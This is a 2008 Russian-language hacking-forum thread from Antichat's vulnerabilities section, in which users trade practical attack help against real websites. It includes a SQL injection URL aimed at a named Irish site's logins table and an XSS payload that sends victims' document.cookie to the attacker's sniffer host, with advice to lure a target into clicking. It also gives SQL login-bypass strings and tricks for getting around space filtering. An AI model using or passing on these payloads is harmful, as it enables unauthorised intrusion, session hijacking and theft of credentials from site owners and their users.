ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4011  
Старый 04.12.2008, 17:58
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

~EviL~
ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором...
Цитата:
http://www.mcmusic.ie/index.asp?secID=-1+union+select+1,2,3,4,5+from+tbl_logins
 
Ответить с цитированием

  #4012  
Старый 04.12.2008, 18:53
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

Спасибо Попробую довести до победного конца =)
 
Ответить с цитированием

  #4013  
Старый 04.12.2008, 19:57
NetSter
студент
Регистрация: 30.07.2007
Сообщений: 800
Провел на форуме:
4275992

Репутация: 1188


По умолчанию

в этом деле новичок.
еще пока не научился использовать XSS но уже нашел парочку. может кому пригодится кто шарит в этом.


там в нескольких нужно вбивать в поля.
PS/ сильно не пинать я только учусь.
 
Ответить с цитированием

  #4014  
Старый 04.12.2008, 20:02
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

а чо там использвать - втавляй вместо alert('xss') такой код:

window.location.href='http://твой_сайт/s.gif?'+document.cookie;

где s.gif - твой снифер

и давай такую ссылку, чтобы он по ней тыцкнул тому, чьи куки хочешь поиметь
 
Ответить с цитированием

  #4015  
Старый 04.12.2008, 22:54
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

с перенаправлением галимо и палевно. Лучше создавать картинку посредством яваскрипт
 
Ответить с цитированием

  #4016  
Старый 04.12.2008, 22:59
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Есть сервер с багнутым ПОСТ запросом.
Login, pwd.
Баг в первом варианте. Причем надо чтоб было хоть что - либо во втором.
Пример:

Login: ' or 1=(@@version)--
Pwd: kakawka

:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.


Что посоветуете в данном вопросе? (чтоб вывело результат первого запроса)
 
Ответить с цитированием

  #4017  
Старый 04.12.2008, 23:59
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

У меня сейчас подобная проблема. При вводе вышеуказанной комбинации сервер отвечает:
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or1=1--' AND (IsNull(CodAff) OR CodAff='')' at line 1

/login.asp, line 16
Пробелы он не воспринимает. Как можно указать пробелы? Пытался
Цитата:
'%25or%151=1-- таки бестолку.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND (IsNull(CodAff) OR CodAff='')' at line 1

Последний раз редактировалось Ershik; 05.12.2008 в 11:56..
 
Ответить с цитированием

  #4018  
Старый 05.12.2008, 00:09
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ershik  
Как можно указать пробелы?
1'or'1'='1'
1)or(1)=(1)
1'or'1'='1
и т.д

Пробелы как таковые не нужны вообще
 
Ответить с цитированием

  #4019  
Старый 05.12.2008, 00:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Аналоги ПРОБЕЛА:
+ или %2B
 
Ответить с цитированием

  #4020  
Старый 05.12.2008, 00:21
Ghost0ff
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973

Репутация: 15
Отправить сообщение для Ghost0ff с помощью ICQ
По умолчанию

хм. +, либо еще /**/ бывает прокатывает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ